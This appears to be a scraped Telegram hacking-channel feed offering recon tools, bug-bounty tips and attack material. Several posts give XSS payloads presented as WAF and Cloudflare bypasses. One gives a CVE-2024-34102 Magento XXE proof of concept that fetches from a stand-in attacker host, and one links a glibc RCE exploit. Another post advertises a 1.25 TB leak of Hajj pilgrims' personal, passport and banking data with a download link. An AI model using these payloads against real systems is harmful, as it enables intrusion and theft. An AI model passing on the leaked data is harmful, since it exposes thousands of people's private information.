Experts warn of a new ATM malware family that is advertised in the cybercrime underground, it was developed to target Europe.
🌎 Blog
#ATM #Malware #News
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
#ATM #Malware #News
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2🔥2❤1
CNEXT exploits
💬
Exploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv()
👁🗨 Technical analysis:
The vulnerability and exploits are described in the following blogposts:
⚪️ Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine (part 1)
⚪️ To be continued...
🗝 Exploits:
Exploits will become available as blogposts come out.
⚪️ CNEXT: file read to RCE exploit
⚪️ To be continued...
😸 Github
⬇️ Download
🔒
#CVE #Exploit #Cnext
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Exploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv()
The vulnerability and exploits are described in the following blogposts:
Exploits will become available as blogposts come out.
BugCod3#CVE #Exploit #Cnext
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2🔥2❤1
DOMAINIM
💬
Domainim is a fast domain reconnaissance tool for organizational network scanning. The tool aims to provide a brief overview of an organization's structure using techniques like OSINT, bruteforcing, DNS resolving etc.
📊 Features:
⚪️ Subdomain enumeration (2 engines + bruteforcing)
⚪️ User-friendly output
⚪️ Resolving A records (IPv4)
⚪️ Virtual hostname enumeration
⚪️ Reverse DNS lookup
⚪️ Detects wildcard subdomains (for bruteforcing)
⚪️ Basic TCP port scanning
⚪️ Subdomains are accepted as input
⚪️ Export results to JSON file
🔼 Installation:
💻 Usage:
📂 Examples:
⚪️
⚪️
⚪️
⚪️
⚪️
😸 Github
⬇️ Download
🔒
#Pentest #RedTeam #Tools
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Domainim is a fast domain reconnaissance tool for organizational network scanning. The tool aims to provide a brief overview of an organization's structure using techniques like OSINT, bruteforcing, DNS resolving etc.
cd domainim
nimble build
./domainim <domain> [--ports=<ports>]
./domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
./domainim nmap.org --ports=all./domainim google.com --ports=none --dns=8.8.8.8#53./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --rps=1500./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --outfile=results.json./domainim mysite.com --ports=t50,5432,7000-9000 --dns=1.1.1.1BugCod3#Pentest #RedTeam #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3⚡2❤1👍1
GAP Burp Extension
💬
This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing. The full Help documentation can be found here or from the Help icon on the GAP tab.
🔼 Installation:
⚪️ Visit Jython Offical Site, and download the latest stand alone JAR file, e.g.
⚪️ Open Burp, go to Extensions -> Extension Settings -> Python Environment, set the Location of Jython standalone JAR file and Folder for loading modules to the directory where the Jython JAR file was saved.
⚪️ On a command line, go to the directory where the jar file is and run
⚪️ Download the
⚪️ nstall Jython modules by running
⚪️ Go to the Extensions -> Installed and click Add under Burp Extensions.
⚪️ Select Extension type of Python and select the GAP.py file.
💻 Using:
⚪️ Just select a target in your Burp scope (or multiple targets), or even just one subfolder or endpoint, and choose extension GAP
⚪️ you can right click a request or response in any other context and select GAP from the Extensions menu.
😸 Github
⬇️ Download
🔒
#BurpSuite #Extensions
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
This is an evolution of the original getAllParams extension for Burp. Not only does it find more potential parameters for you to investigate, but it also finds potential links to try these parameters on, and produces a target specific wordlist to use for fuzzing. The full Help documentation can be found here or from the Help icon on the GAP tab.
jython-standalone-2.7.3.jar.java -jar jython-standalone-2.7.3.jar -m ensurepip.GAP.py and requirements.txt from this project and place in the same directory.java -jar jython-standalone-2.7.3.jar -m pip install -r requirements.txt.BugCod3#BurpSuite #Extensions
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3⚡2❤1👍1
LazyEgg - Hunting JS Files
#BugBounty #Tips #CyberSec
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
waybackurls target | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && python lazyegg[.]py "{}" --js_urls --domains --ips'#BugBounty #Tips #CyberSec
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3⚡2❤1
Cross Site Scripting Xss Payload
Payload:
#XSS #Payload
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Payload:
%22%3C!--%3E%3CSvg%20OnLoad=confirm?.(/d3rk%F0%9F%98%88/)%3C!--1%22%29%22%3C%21--%3E%3CSvg+OnLoad%3Dconfirm%3f%2e%28%2fd3rk%F0%9F%98%88%2f%29%3C%21--#XSS #Payload
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3⚡2❤1
In short, we have the following from the pilgrims during the years 1363 to 1403:
- Name, surname, father's name, date of birth, place of birth, birth certificate number, national code, national card series, marital status, occupation
- Contact information (home and work address, postal code, landline and mobile phone)
- Detailed inquiry information from the passport police (passport number, date of issuance and expiration) + passport scan
- 3x4 photo of pilgrims
- Visitor flight information
- Pilgrim insurance information
- Bail document information
- Banking and payment information
- Complete information of Hajj brokers
- Information about the accommodation status of pilgrims
- Full details of government and government officials
- Full details of quota dispatch, such as the families of the martyrs
- Full details of deployment of Naja forces
- Full details of deployment of Basij forces
- Full details of spiritual missions
- The source code of the organization's programs and services
Total data volume: 1.25 TB
https://mega.nz/file/sYg0AT7C#fbfecMm0TJSx5MF25dU5TUK8mZvdzkKhKRTsQJCs-F0
#Haj #News
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2❤🔥1
311138#Burpsuite #Pro #Tools
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2👍2🔥2❤1
This media is not supported in your browser
VIEW IN TELEGRAM
Bypassing WAF through a large number of characters is a successful method
#Bypass #Waf
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
#Bypass #Waf
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4❤3⚡2
🕵️ Eyes is an OSINT tool to get existing accounts from an email
About:
Eyes is osint tool based on account search from an email address
Eyes is able to find not only if an account is existing on different sites but also to find the account in question (with certain modules)
even if the profile has nothing to do with the email 😲!
All this without warning the target 🕵️♂️
📊 Features of noscript:
⚪️ fully async
⚪️ asynchrone scraping
⚪️ menu in cli format (commands)
📂 Requirements / Launch:
⚪️ Python 3
⚪️ Git
⚪️ New terminal (to display emojis) # only for windows
💻 Usage:
😸 Github
⬇️ Download
🔒
#Osint #Email
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
About:
Eyes is osint tool based on account search from an email address
Eyes is able to find not only if an account is existing on different sites but also to find the account in question (with certain modules)
even if the profile has nothing to do with the email 😲!
All this without warning the target 🕵️♂️
usage: eyes.py [-h] [-m] [email]
positional arguments:
email search information on the target email with modules, services...
options:
-h, --help show this help message and exit
-m, --modules gives you all the email modules used by Eyes
BugCod3#Osint #Email
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4🔥2❤1👍1
payload
#Payload
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
<img+src=oNlY=1+ onerror="alert(['a', 'x', 'b', 'x', 'c', 's'].map(c => c.replace(/[abc]/g, '')).join(''))"><img+src=oNlY=1+ onerror="alert(['x', String.fromCharCode(121), 'x', 's'].filter(c => c.charCodeAt(0) !== 121).join(''))">#Payload
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2🔥2❤1
CVE-2024-34102 POC
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
#CVE #POC
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"http://attacker*com/xxe.xml","dataIsURL":true,"options":1337}}}}}}#CVE #POC
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2🔥2❤1
A Cloudflare WAF bypass combining simple (but efficient) tricks
A payload with some obfuscation & filter evasion tricks
#CF #WAF #Bypass #Payload
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1`>A payload with some obfuscation & filter evasion tricks
<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>#CF #WAF #Bypass #Payload
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡3🔥3❤1
Bug-Bounty-Wordlists
⬇️ Download
🔒
#BugBounty #Wordlist
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
BugCod3#BugBounty #Wordlist
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2🔥2❤1
This media is not supported in your browser
VIEW IN TELEGRAM
This is how a Cybercriminal exploits phone calls to steal Data/OTP using IVR.
#News #Scam #Alert
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
#News #Scam #Alert
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🤯3🤔2👀2🫡2
excludeparked
💬
A lightweight Python 3 noscript that filters out parked HTTP domains from a list of domains. Useful when pulling a list of domains from a reverse WHOIS lookup service (from a tool such as WHOXY).
This was tested on a list of 100k parked domains but it's subject to improvement as this tool is intended to be a rough method of filtering down thousands of domains in the recon phase of a pentest.
🔼 Install:
💻 Usage:
😸 Github
⬇️ Download
🔒
#Python #Parked #Domain
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
A lightweight Python 3 noscript that filters out parked HTTP domains from a list of domains. Useful when pulling a list of domains from a reverse WHOIS lookup service (from a tool such as WHOXY).
This was tested on a list of 100k parked domains but it's subject to improvement as this tool is intended to be a rough method of filtering down thousands of domains in the recon phase of a pentest.
cd excludeparked
pip install -r requirements.txt
python3 ./excludeparked.py -h
BugCod3#Python #Parked #Domain
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2🔥2⚡1👍1
Simple Low-Hanging Bug:
Cache purge requests are not authenticated.
→ curl -X PURGE https://target[.]evil[.]com
→ curl -s -D - https://target[.]evil[.]com -o /dev/null
#BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Cache purge requests are not authenticated.
→ curl -X PURGE https://target[.]evil[.]com
→ curl -s -D - https://target[.]evil[.]com -o /dev/null
#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3⚡2❤1👍1
XSS WAF Bypass by multi-char HTML entities
fj translates to fj
>⃒ translates to > + [?]
<⃒ translates to < + [?]
[?] - Unicode symbol
#BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
fj translates to fj
>⃒ translates to > + [?]
<⃒ translates to < + [?]
[?] - Unicode symbol
#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4⚡1❤1
dnsX
A fast and multi-purpose DNS toolkit designed for running DNS queries
💬
📊 Features:
⚪️ Simple and Handy utility to query DNS records.
⚪️ A, AAAA, CNAME, PTR, NS, MX, TXT, SRV, SOA query support
⚪️ DNS Resolution / Brute-force support
⚪️ Custom resolver input support
⚪️ Multiple resolver format (TCP/UDP/DOH/DOT) support
⚪️ stdin and stdout support
⚪️ Automatic wildcard handling support
🔼 Installation:
💻 Usage:
😸 Github
⬇️ Download
🔒
#cli #dns #bruteforce #wildcard
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
A fast and multi-purpose DNS toolkit designed for running DNS queries
dnsx is a fast and multi-purpose DNS toolkit designed for running various probes through the retryabledns library. It supports multiple DNS queries, user supplied resolvers, DNS wildcard filtering like shuffledns etc.dnsx requires go1.21 to install successfully. Run the following command to install the latest version:go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest
dnsx -h
BugCod3#cli #dns #bruteforce #wildcard
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡2🔥2❤1👍1🍾1